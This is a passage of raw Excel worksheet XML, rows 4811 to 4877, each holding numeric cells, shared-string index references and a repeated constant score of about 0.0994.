    <row r="4811" ht="15.75" customHeight="1">
      <c r="A4811" s="1">
        <v>2072.0</v>
      </c>
      <c r="B4811" s="2">
        <v>3.1105644E7</v>
      </c>
      <c r="C4811" s="2" t="s">
        <v>4597</v>
      </c>
      <c r="D4811" s="2">
        <v>1.0</v>
      </c>
      <c r="E4811" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4811" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4812" ht="15.75" customHeight="1">
      <c r="A4812" s="1">
        <v>2171.0</v>
      </c>
      <c r="B4812" s="2">
        <v>3.17669E7</v>
      </c>
      <c r="C4812" s="2" t="s">
        <v>4598</v>
      </c>
      <c r="D4812" s="2">
        <v>1.0</v>
      </c>
      <c r="E4812" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4812" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4813" ht="15.75" customHeight="1">
      <c r="A4813" s="1">
        <v>2416.0</v>
      </c>
      <c r="B4813" s="2">
        <v>3.3524258E7</v>
      </c>
      <c r="C4813" s="2" t="s">
        <v>4599</v>
      </c>
      <c r="D4813" s="2">
        <v>1.0</v>
      </c>
      <c r="E4813" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4813" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4814" ht="15.75" customHeight="1">
      <c r="A4814" s="1">
        <v>2670.0</v>
      </c>
      <c r="B4814" s="2">
        <v>3.474106E7</v>
      </c>
      <c r="C4814" s="2" t="s">
        <v>4600</v>
      </c>
      <c r="D4814" s="2">
        <v>1.0</v>
      </c>
      <c r="E4814" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4814" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4815" ht="15.75" customHeight="1">
      <c r="A4815" s="1">
        <v>3120.0</v>
      </c>
      <c r="B4815" s="2">
        <v>3.6812686E7</v>
      </c>
      <c r="C4815" s="2" t="s">
        <v>4601</v>
      </c>
      <c r="D4815" s="2">
        <v>1.0</v>
      </c>
      <c r="E4815" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4815" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4816" ht="15.75" customHeight="1">
      <c r="A4816" s="1">
        <v>3470.0</v>
      </c>
      <c r="B4816" s="2">
        <v>3.8340092E7</v>
      </c>
      <c r="C4816" s="2" t="s">
        <v>4602</v>
      </c>
      <c r="D4816" s="2">
        <v>1.0</v>
      </c>
      <c r="E4816" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4816" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4817" ht="15.75" customHeight="1">
      <c r="A4817" s="1">
        <v>3716.0</v>
      </c>
      <c r="B4817" s="2">
        <v>3.9606364E7</v>
      </c>
      <c r="C4817" s="2" t="s">
        <v>4603</v>
      </c>
      <c r="D4817" s="2">
        <v>1.0</v>
      </c>
      <c r="E4817" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4817" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4818" ht="15.75" customHeight="1">
      <c r="A4818" s="1">
        <v>3881.0</v>
      </c>
      <c r="B4818" s="2">
        <v>4.0360728E7</v>
      </c>
      <c r="C4818" s="2" t="s">
        <v>4604</v>
      </c>
      <c r="D4818" s="2">
        <v>1.0</v>
      </c>
      <c r="E4818" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4818" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4819" ht="15.75" customHeight="1">
      <c r="A4819" s="1">
        <v>4287.0</v>
      </c>
      <c r="B4819" s="2">
        <v>4.1902902E7</v>
      </c>
      <c r="C4819" s="2" t="s">
        <v>4605</v>
      </c>
      <c r="D4819" s="2">
        <v>1.0</v>
      </c>
      <c r="E4819" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4819" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4820" ht="15.75" customHeight="1">
      <c r="A4820" s="1">
        <v>4321.0</v>
      </c>
      <c r="B4820" s="2">
        <v>4.2034448E7</v>
      </c>
      <c r="C4820" s="2" t="s">
        <v>4606</v>
      </c>
      <c r="D4820" s="2">
        <v>1.0</v>
      </c>
      <c r="E4820" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4820" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4821" ht="15.75" customHeight="1">
      <c r="A4821" s="1">
        <v>4496.0</v>
      </c>
      <c r="B4821" s="2">
        <v>4.2536729E7</v>
      </c>
      <c r="C4821" s="2" t="s">
        <v>4607</v>
      </c>
      <c r="D4821" s="2">
        <v>1.0</v>
      </c>
      <c r="E4821" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4821" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4822" ht="15.75" customHeight="1">
      <c r="A4822" s="1">
        <v>4600.0</v>
      </c>
      <c r="B4822" s="2">
        <v>4.2817825E7</v>
      </c>
      <c r="C4822" s="2" t="s">
        <v>4608</v>
      </c>
      <c r="D4822" s="2">
        <v>1.0</v>
      </c>
      <c r="E4822" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4822" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4823" ht="15.75" customHeight="1">
      <c r="A4823" s="1">
        <v>4694.0</v>
      </c>
      <c r="B4823" s="2">
        <v>4.3232533E7</v>
      </c>
      <c r="C4823" s="2" t="s">
        <v>4609</v>
      </c>
      <c r="D4823" s="2">
        <v>1.0</v>
      </c>
      <c r="E4823" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4823" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4824" ht="15.75" customHeight="1">
      <c r="A4824" s="1">
        <v>4736.0</v>
      </c>
      <c r="B4824" s="2">
        <v>4.3342149E7</v>
      </c>
      <c r="C4824" s="2" t="s">
        <v>4610</v>
      </c>
      <c r="D4824" s="2">
        <v>1.0</v>
      </c>
      <c r="E4824" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4824" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4825" ht="15.75" customHeight="1">
      <c r="A4825" s="1">
        <v>4944.0</v>
      </c>
      <c r="B4825" s="2">
        <v>4.4035764E7</v>
      </c>
      <c r="C4825" s="2" t="s">
        <v>4611</v>
      </c>
      <c r="D4825" s="2">
        <v>1.0</v>
      </c>
      <c r="E4825" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4825" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4826" ht="15.75" customHeight="1">
      <c r="A4826" s="1">
        <v>5013.0</v>
      </c>
      <c r="B4826" s="2">
        <v>4.4199713E7</v>
      </c>
      <c r="C4826" s="2" t="s">
        <v>4612</v>
      </c>
      <c r="D4826" s="2">
        <v>1.0</v>
      </c>
      <c r="E4826" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4826" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4827" ht="15.75" customHeight="1">
      <c r="A4827" s="1">
        <v>5031.0</v>
      </c>
      <c r="B4827" s="2">
        <v>4.4259036E7</v>
      </c>
      <c r="C4827" s="2" t="s">
        <v>4613</v>
      </c>
      <c r="D4827" s="2">
        <v>1.0</v>
      </c>
      <c r="E4827" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4827" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4828" ht="15.75" customHeight="1">
      <c r="A4828" s="1">
        <v>5033.0</v>
      </c>
      <c r="B4828" s="2">
        <v>4.426413E7</v>
      </c>
      <c r="C4828" s="2" t="s">
        <v>4614</v>
      </c>
      <c r="D4828" s="2">
        <v>1.0</v>
      </c>
      <c r="E4828" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4828" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4829" ht="15.75" customHeight="1">
      <c r="A4829" s="1">
        <v>5090.0</v>
      </c>
      <c r="B4829" s="2">
        <v>4.4483401E7</v>
      </c>
      <c r="C4829" s="2" t="s">
        <v>4615</v>
      </c>
      <c r="D4829" s="2">
        <v>1.0</v>
      </c>
      <c r="E4829" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4829" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4830" ht="15.75" customHeight="1">
      <c r="A4830" s="1">
        <v>5135.0</v>
      </c>
      <c r="B4830" s="2">
        <v>4.4623925E7</v>
      </c>
      <c r="C4830" s="2" t="s">
        <v>4616</v>
      </c>
      <c r="D4830" s="2">
        <v>1.0</v>
      </c>
      <c r="E4830" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4830" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4831" ht="15.75" customHeight="1">
      <c r="A4831" s="1">
        <v>5187.0</v>
      </c>
      <c r="B4831" s="2">
        <v>4.4787543E7</v>
      </c>
      <c r="C4831" s="2" t="s">
        <v>4617</v>
      </c>
      <c r="D4831" s="2">
        <v>1.0</v>
      </c>
      <c r="E4831" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4831" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4832" ht="15.75" customHeight="1">
      <c r="A4832" s="1">
        <v>5410.0</v>
      </c>
      <c r="B4832" s="2">
        <v>4.551789E7</v>
      </c>
      <c r="C4832" s="2" t="s">
        <v>4618</v>
      </c>
      <c r="D4832" s="2">
        <v>1.0</v>
      </c>
      <c r="E4832" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4832" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4833" ht="15.75" customHeight="1">
      <c r="A4833" s="1">
        <v>5706.0</v>
      </c>
      <c r="B4833" s="2">
        <v>4.6542176E7</v>
      </c>
      <c r="C4833" s="2" t="s">
        <v>4619</v>
      </c>
      <c r="D4833" s="2">
        <v>1.0</v>
      </c>
      <c r="E4833" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4833" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4834" ht="15.75" customHeight="1">
      <c r="A4834" s="1">
        <v>5834.0</v>
      </c>
      <c r="B4834" s="2">
        <v>4.6905201E7</v>
      </c>
      <c r="C4834" s="2" t="s">
        <v>4620</v>
      </c>
      <c r="D4834" s="2">
        <v>1.0</v>
      </c>
      <c r="E4834" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4834" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4835" ht="15.75" customHeight="1">
      <c r="A4835" s="1">
        <v>6099.0</v>
      </c>
      <c r="B4835" s="2">
        <v>4.7702804E7</v>
      </c>
      <c r="C4835" s="2" t="s">
        <v>4621</v>
      </c>
      <c r="D4835" s="2">
        <v>1.0</v>
      </c>
      <c r="E4835" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4835" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4836" ht="15.75" customHeight="1">
      <c r="A4836" s="1">
        <v>6378.0</v>
      </c>
      <c r="B4836" s="2">
        <v>4.8413803E7</v>
      </c>
      <c r="C4836" s="2" t="s">
        <v>4622</v>
      </c>
      <c r="D4836" s="2">
        <v>1.0</v>
      </c>
      <c r="E4836" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4836" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4837" ht="15.75" customHeight="1">
      <c r="A4837" s="1">
        <v>6591.0</v>
      </c>
      <c r="B4837" s="2">
        <v>4.8978375E7</v>
      </c>
      <c r="C4837" s="2" t="s">
        <v>4623</v>
      </c>
      <c r="D4837" s="2">
        <v>1.0</v>
      </c>
      <c r="E4837" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4837" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4838" ht="15.75" customHeight="1">
      <c r="A4838" s="1">
        <v>6755.0</v>
      </c>
      <c r="B4838" s="2">
        <v>4.9390396E7</v>
      </c>
      <c r="C4838" s="2" t="s">
        <v>4624</v>
      </c>
      <c r="D4838" s="2">
        <v>1.0</v>
      </c>
      <c r="E4838" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4838" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4839" ht="15.75" customHeight="1">
      <c r="A4839" s="1">
        <v>7706.0</v>
      </c>
      <c r="B4839" s="2">
        <v>5.1996068E7</v>
      </c>
      <c r="C4839" s="2" t="s">
        <v>4625</v>
      </c>
      <c r="D4839" s="2">
        <v>1.0</v>
      </c>
      <c r="E4839" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4839" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4840" ht="15.75" customHeight="1">
      <c r="A4840" s="1">
        <v>7760.0</v>
      </c>
      <c r="B4840" s="2">
        <v>5.2103569E7</v>
      </c>
      <c r="C4840" s="2" t="s">
        <v>4626</v>
      </c>
      <c r="D4840" s="2">
        <v>1.0</v>
      </c>
      <c r="E4840" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4840" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4841" ht="15.75" customHeight="1">
      <c r="A4841" s="1">
        <v>7924.0</v>
      </c>
      <c r="B4841" s="2">
        <v>5.2561549E7</v>
      </c>
      <c r="C4841" s="2" t="s">
        <v>4627</v>
      </c>
      <c r="D4841" s="2">
        <v>1.0</v>
      </c>
      <c r="E4841" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4841" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4842" ht="15.75" customHeight="1">
      <c r="A4842" s="1">
        <v>8156.0</v>
      </c>
      <c r="B4842" s="2">
        <v>5.3190187E7</v>
      </c>
      <c r="C4842" s="2" t="s">
        <v>4628</v>
      </c>
      <c r="D4842" s="2">
        <v>1.0</v>
      </c>
      <c r="E4842" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4842" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4843" ht="15.75" customHeight="1">
      <c r="A4843" s="1">
        <v>8303.0</v>
      </c>
      <c r="B4843" s="2">
        <v>5.3570924E7</v>
      </c>
      <c r="C4843" s="2" t="s">
        <v>4629</v>
      </c>
      <c r="D4843" s="2">
        <v>1.0</v>
      </c>
      <c r="E4843" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4843" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4844" ht="15.75" customHeight="1">
      <c r="A4844" s="1">
        <v>8367.0</v>
      </c>
      <c r="B4844" s="2">
        <v>5.3799142E7</v>
      </c>
      <c r="C4844" s="2" t="s">
        <v>4630</v>
      </c>
      <c r="D4844" s="2">
        <v>1.0</v>
      </c>
      <c r="E4844" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4844" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4845" ht="15.75" customHeight="1">
      <c r="A4845" s="1">
        <v>8650.0</v>
      </c>
      <c r="B4845" s="2">
        <v>5.4350489E7</v>
      </c>
      <c r="C4845" s="2" t="s">
        <v>4631</v>
      </c>
      <c r="D4845" s="2">
        <v>1.0</v>
      </c>
      <c r="E4845" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4845" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4846" ht="15.75" customHeight="1">
      <c r="A4846" s="1">
        <v>8737.0</v>
      </c>
      <c r="B4846" s="2">
        <v>5.4529441E7</v>
      </c>
      <c r="C4846" s="2" t="s">
        <v>4632</v>
      </c>
      <c r="D4846" s="2">
        <v>1.0</v>
      </c>
      <c r="E4846" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4846" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4847" ht="15.75" customHeight="1">
      <c r="A4847" s="1">
        <v>8760.0</v>
      </c>
      <c r="B4847" s="2">
        <v>5.4575747E7</v>
      </c>
      <c r="C4847" s="2" t="s">
        <v>4633</v>
      </c>
      <c r="D4847" s="2">
        <v>1.0</v>
      </c>
      <c r="E4847" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4847" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4848" ht="15.75" customHeight="1">
      <c r="A4848" s="1">
        <v>8935.0</v>
      </c>
      <c r="B4848" s="2">
        <v>5.4854593E7</v>
      </c>
      <c r="C4848" s="2" t="s">
        <v>4634</v>
      </c>
      <c r="D4848" s="2">
        <v>1.0</v>
      </c>
      <c r="E4848" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4848" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4849" ht="15.75" customHeight="1">
      <c r="A4849" s="1">
        <v>9234.0</v>
      </c>
      <c r="B4849" s="2">
        <v>5.5456818E7</v>
      </c>
      <c r="C4849" s="2" t="s">
        <v>4635</v>
      </c>
      <c r="D4849" s="2">
        <v>1.0</v>
      </c>
      <c r="E4849" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4849" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4850" ht="15.75" customHeight="1">
      <c r="A4850" s="1">
        <v>9357.0</v>
      </c>
      <c r="B4850" s="2">
        <v>5.5678021E7</v>
      </c>
      <c r="C4850" s="2" t="s">
        <v>4636</v>
      </c>
      <c r="D4850" s="2">
        <v>1.0</v>
      </c>
      <c r="E4850" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4850" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4851" ht="15.75" customHeight="1">
      <c r="A4851" s="1">
        <v>9515.0</v>
      </c>
      <c r="B4851" s="2">
        <v>5.596957E7</v>
      </c>
      <c r="C4851" s="2" t="s">
        <v>4637</v>
      </c>
      <c r="D4851" s="2">
        <v>1.0</v>
      </c>
      <c r="E4851" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4851" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4852" ht="15.75" customHeight="1">
      <c r="A4852" s="1">
        <v>9844.0</v>
      </c>
      <c r="B4852" s="2">
        <v>5.6669105E7</v>
      </c>
      <c r="C4852" s="2" t="s">
        <v>4638</v>
      </c>
      <c r="D4852" s="2">
        <v>1.0</v>
      </c>
      <c r="E4852" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4852" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4853" ht="15.75" customHeight="1">
      <c r="A4853" s="1">
        <v>9861.0</v>
      </c>
      <c r="B4853" s="2">
        <v>5.6715695E7</v>
      </c>
      <c r="C4853" s="2" t="s">
        <v>4639</v>
      </c>
      <c r="D4853" s="2">
        <v>1.0</v>
      </c>
      <c r="E4853" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4853" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4854" ht="15.75" customHeight="1">
      <c r="A4854" s="1">
        <v>9950.0</v>
      </c>
      <c r="B4854" s="2">
        <v>5.6892061E7</v>
      </c>
      <c r="C4854" s="2" t="s">
        <v>4640</v>
      </c>
      <c r="D4854" s="2">
        <v>1.0</v>
      </c>
      <c r="E4854" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4854" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4855" ht="15.75" customHeight="1">
      <c r="A4855" s="1">
        <v>10493.0</v>
      </c>
      <c r="B4855" s="2">
        <v>1.1276264E7</v>
      </c>
      <c r="C4855" s="2" t="s">
        <v>4641</v>
      </c>
      <c r="D4855" s="2">
        <v>1.0</v>
      </c>
      <c r="E4855" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4855" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4856" ht="15.75" customHeight="1">
      <c r="A4856" s="1">
        <v>10530.0</v>
      </c>
      <c r="B4856" s="2">
        <v>1.2236771E7</v>
      </c>
      <c r="C4856" s="2" t="s">
        <v>4642</v>
      </c>
      <c r="D4856" s="2">
        <v>1.0</v>
      </c>
      <c r="E4856" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4856" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4857" ht="15.75" customHeight="1">
      <c r="A4857" s="1">
        <v>11096.0</v>
      </c>
      <c r="B4857" s="2">
        <v>1.8537332E7</v>
      </c>
      <c r="C4857" s="2" t="s">
        <v>4643</v>
      </c>
      <c r="D4857" s="2">
        <v>1.0</v>
      </c>
      <c r="E4857" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4857" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4858" ht="15.75" customHeight="1">
      <c r="A4858" s="1">
        <v>11363.0</v>
      </c>
      <c r="B4858" s="2">
        <v>2.1348651E7</v>
      </c>
      <c r="C4858" s="2" t="s">
        <v>4644</v>
      </c>
      <c r="D4858" s="2">
        <v>1.0</v>
      </c>
      <c r="E4858" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4858" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4859" ht="15.75" customHeight="1">
      <c r="A4859" s="1">
        <v>11467.0</v>
      </c>
      <c r="B4859" s="2">
        <v>2.1953931E7</v>
      </c>
      <c r="C4859" s="2" t="s">
        <v>4645</v>
      </c>
      <c r="D4859" s="2">
        <v>1.0</v>
      </c>
      <c r="E4859" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4859" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4860" ht="15.75" customHeight="1">
      <c r="A4860" s="1">
        <v>11746.0</v>
      </c>
      <c r="B4860" s="2">
        <v>2.4102234E7</v>
      </c>
      <c r="C4860" s="2" t="s">
        <v>4646</v>
      </c>
      <c r="D4860" s="2">
        <v>1.0</v>
      </c>
      <c r="E4860" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4860" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4861" ht="15.75" customHeight="1">
      <c r="A4861" s="1">
        <v>11768.0</v>
      </c>
      <c r="B4861" s="2">
        <v>2.4212143E7</v>
      </c>
      <c r="C4861" s="2" t="s">
        <v>4647</v>
      </c>
      <c r="D4861" s="2">
        <v>1.0</v>
      </c>
      <c r="E4861" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4861" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4862" ht="15.75" customHeight="1">
      <c r="A4862" s="1">
        <v>12001.0</v>
      </c>
      <c r="B4862" s="2">
        <v>2.5961838E7</v>
      </c>
      <c r="C4862" s="2" t="s">
        <v>4648</v>
      </c>
      <c r="D4862" s="2">
        <v>1.0</v>
      </c>
      <c r="E4862" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4862" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4863" ht="15.75" customHeight="1">
      <c r="A4863" s="1">
        <v>12159.0</v>
      </c>
      <c r="B4863" s="2">
        <v>2.7305774E7</v>
      </c>
      <c r="C4863" s="2" t="s">
        <v>4649</v>
      </c>
      <c r="D4863" s="2">
        <v>1.0</v>
      </c>
      <c r="E4863" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4863" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4864" ht="15.75" customHeight="1">
      <c r="A4864" s="1">
        <v>12228.0</v>
      </c>
      <c r="B4864" s="2">
        <v>2.7780394E7</v>
      </c>
      <c r="C4864" s="2" t="s">
        <v>4650</v>
      </c>
      <c r="D4864" s="2">
        <v>1.0</v>
      </c>
      <c r="E4864" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4864" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4865" ht="15.75" customHeight="1">
      <c r="A4865" s="1">
        <v>12246.0</v>
      </c>
      <c r="B4865" s="2">
        <v>2.7896207E7</v>
      </c>
      <c r="C4865" s="2" t="s">
        <v>4651</v>
      </c>
      <c r="D4865" s="2">
        <v>1.0</v>
      </c>
      <c r="E4865" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4865" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4866" ht="15.75" customHeight="1">
      <c r="A4866" s="1">
        <v>12286.0</v>
      </c>
      <c r="B4866" s="2">
        <v>2.8185662E7</v>
      </c>
      <c r="C4866" s="2" t="s">
        <v>4652</v>
      </c>
      <c r="D4866" s="2">
        <v>1.0</v>
      </c>
      <c r="E4866" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4866" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4867" ht="15.75" customHeight="1">
      <c r="A4867" s="1">
        <v>12714.0</v>
      </c>
      <c r="B4867" s="2">
        <v>3.0846125E7</v>
      </c>
      <c r="C4867" s="2" t="s">
        <v>4653</v>
      </c>
      <c r="D4867" s="2">
        <v>1.0</v>
      </c>
      <c r="E4867" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4867" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4868" ht="15.75" customHeight="1">
      <c r="A4868" s="1">
        <v>12920.0</v>
      </c>
      <c r="B4868" s="2">
        <v>3.2256871E7</v>
      </c>
      <c r="C4868" s="2" t="s">
        <v>4654</v>
      </c>
      <c r="D4868" s="2">
        <v>1.0</v>
      </c>
      <c r="E4868" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4868" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4869" ht="15.75" customHeight="1">
      <c r="A4869" s="1">
        <v>13113.0</v>
      </c>
      <c r="B4869" s="2">
        <v>3.3581707E7</v>
      </c>
      <c r="C4869" s="2" t="s">
        <v>4655</v>
      </c>
      <c r="D4869" s="2">
        <v>1.0</v>
      </c>
      <c r="E4869" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4869" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4870" ht="15.75" customHeight="1">
      <c r="A4870" s="1">
        <v>13476.0</v>
      </c>
      <c r="B4870" s="2">
        <v>3.530774E7</v>
      </c>
      <c r="C4870" s="2" t="s">
        <v>4656</v>
      </c>
      <c r="D4870" s="2">
        <v>1.0</v>
      </c>
      <c r="E4870" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4870" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4871" ht="15.75" customHeight="1">
      <c r="A4871" s="1">
        <v>13765.0</v>
      </c>
      <c r="B4871" s="2">
        <v>3.6517667E7</v>
      </c>
      <c r="C4871" s="2" t="s">
        <v>4657</v>
      </c>
      <c r="D4871" s="2">
        <v>1.0</v>
      </c>
      <c r="E4871" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4871" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4872" ht="15.75" customHeight="1">
      <c r="A4872" s="1">
        <v>13799.0</v>
      </c>
      <c r="B4872" s="2">
        <v>3.6633276E7</v>
      </c>
      <c r="C4872" s="2" t="s">
        <v>4658</v>
      </c>
      <c r="D4872" s="2">
        <v>1.0</v>
      </c>
      <c r="E4872" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4872" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4873" ht="15.75" customHeight="1">
      <c r="A4873" s="1">
        <v>13859.0</v>
      </c>
      <c r="B4873" s="2">
        <v>3.6933779E7</v>
      </c>
      <c r="C4873" s="2" t="s">
        <v>4659</v>
      </c>
      <c r="D4873" s="2">
        <v>1.0</v>
      </c>
      <c r="E4873" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4873" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4874" ht="15.75" customHeight="1">
      <c r="A4874" s="1">
        <v>14115.0</v>
      </c>
      <c r="B4874" s="2">
        <v>3.778507E7</v>
      </c>
      <c r="C4874" s="2" t="s">
        <v>4660</v>
      </c>
      <c r="D4874" s="2">
        <v>1.0</v>
      </c>
      <c r="E4874" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4874" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4875" ht="15.75" customHeight="1">
      <c r="A4875" s="1">
        <v>14131.0</v>
      </c>
      <c r="B4875" s="2">
        <v>3.7893976E7</v>
      </c>
      <c r="C4875" s="2" t="s">
        <v>4661</v>
      </c>
      <c r="D4875" s="2">
        <v>1.0</v>
      </c>
      <c r="E4875" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4875" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4876" ht="15.75" customHeight="1">
      <c r="A4876" s="1">
        <v>14673.0</v>
      </c>
      <c r="B4876" s="2">
        <v>4.045512E7</v>
      </c>
      <c r="C4876" s="2" t="s">
        <v>4662</v>
      </c>
      <c r="D4876" s="2">
        <v>1.0</v>
      </c>
      <c r="E4876" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4876" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="4877" ht="15.75" customHeight="1">
      <c r="A4877" s="1">
        <v>14914.0</v>
      </c>
      <c r="B4877" s="2">
        <v>4.1191503E7</v>
      </c>
      <c r="C4877" s="2" t="s">
        <v>4663</v>
      </c>
      <c r="D4877" s="2">
        <v>1.0</v>
      </c>
      <c r="E4877" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4877" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
